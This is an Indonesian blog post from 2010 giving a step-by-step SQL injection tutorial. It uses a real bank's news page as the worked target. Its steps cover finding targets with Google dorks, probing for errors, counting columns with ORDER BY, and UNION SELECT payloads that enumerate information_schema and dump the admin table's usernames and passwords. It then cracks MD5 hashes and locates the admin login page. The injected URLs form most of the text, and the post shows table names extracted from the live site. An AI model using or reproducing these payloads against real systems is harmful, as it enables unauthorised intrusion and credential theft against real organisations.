Sabtu, 18 September 2010
Step by Step SQL injection
===[1]===
Mencari target,, untuk mencari target kalian dapat memakai google dorks untuk SQLi http://suddendeath.000space.com/trik/Dork_SQLi.txt contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193
===[2]===
Setelah menemukan target , langkah berikutnya adalah mengecek apakah target dapat di inject atau tidak. cara mengecek dengan menambahkan karakter ‘ atau – sebelum angka.
contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193′ http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=-193
jika ditemukan pesan error seperti Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ ORDER BY AddDate DESC’ at line 1 Atau tampilan halaman page berubah dari tampilan sebelumnya Maka target tersebut vuln / dapat di inject.
===[3]===
gunakan perintah : +order+by+angka– contoh: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+1… http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+2… http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+3… http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+d… http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+1… http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+1…
ketika menginject sampai angka ini muncul pesan error/berubah tampilan maka jumlah tabel berarti hanya berjumlah 14
===[4]===
Karena tadi error sampai angka 15 Gunakan perintah : +and+1=2+union+select+angka_sampai_jumlah_tabel– Maka: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+un… Maka akan muncul angka misalnya angka 3 ,5 (angka kadang muncul lebih dari 2) version() —> untuk menampilkan versi database Masukan perintah tsb pada angka yg keluar tadi contoh: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14– Nah disini akan muncul versi nya jika versi 5 maka anda beruntung tapi jika table nya versi 4 tinggalkan saja soalnya kita perlu menebak nama tablenya, ada ratusan cape dech…. contoh nya : 5.0.51b-community……bla..bla 4.0.51b-commun…..bla..bla
===[5]===
Untuk versi 4 table = user, admin, administrator, myql.user, etc column = username, password-user, passwd – etc
Untuk versi 5 Untuk menampilkan semua isi dari table tersebut adalah Perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi dan Perintah +from+information_schema.tables+where+table_schema=database()– –> dimasukan setelah angka terakhir Contoh: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()– maka muncul : _career_app_form,admin,admin_log,admin_tb,annual_meeting,annual_meeting_category,annual_report,annual_report_category,article_special,article_special_category,board_gallery,board_gallery_bak_23-9-2008,board_gallery_category,board_gallery_category_bak_23-9-2008,car_insurance_reg,car_loan_reg,car_loan_reg_category,career_app_form,career_back Cari table dengan nama seperti atau mendekati nama2 seperti ini pada tabel yg muncul seperti diatas user, usr, username, user_name, login, user_admin, name, admin_user, dll di dalam tersebut biasanya tersimpan username dan password. dalam contoh ini adalah admin ubah dulu kata users ke dalam hexa memakai ascii converter ini http://suddendeath.000space.com/files/ascii.html “admin” di convert hasilnya adalah 0×61646D696E
===[6]===
Mencari isi table Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi perintah : +from+information_schema.columns+where+table_name=0xhexa– -> dimasukan setelah angka terakhir ganti hexa dengan kata users yg sudah di convert ke hexa contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0×61646D696E– Maka isi dari table admin adalah AdminID,Username,Password,Fname,Lname,AdminType,AddDate,Active,UpdateDate ===[7]===
Melihat isi dari Username,Password. gunakan perintah : group_concat(0×3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi perintah +from+nama table berasal -> dimasukan setelah angka terakhir contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(Username,0×3a,Password),4,5,6,7,8,9,10,11,12,13,14+from+admin 0×3a diantara username dan password adalah tanda : (titik dua ) maka akan muncul data2nya misalnya : admin:password,userlain:passwordlain jika passwordnya berupa hash md5 seperti “ab1984e073f70207fbf95400d52a8c04″ hasil cracknya : 5422907 cracknya disini : http://suddendeath.000space.com cari tab md5
===[8]===
Langkah terakhir adalah mencari halaman login admin, bisa menggunkan tool ini http://www.plunder.com/Admin-Finder-download-e2d61a4182.htm masukkan url target http://www.target.com scan
./virgi a.k.a kodok
5
.//allasca: Belajar SQLi
Step by Step SQL injection ===[1]=== Mencari target,, untuk mencari target kalian dapat memakai google dorks untuk SQLi http://suddend...
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar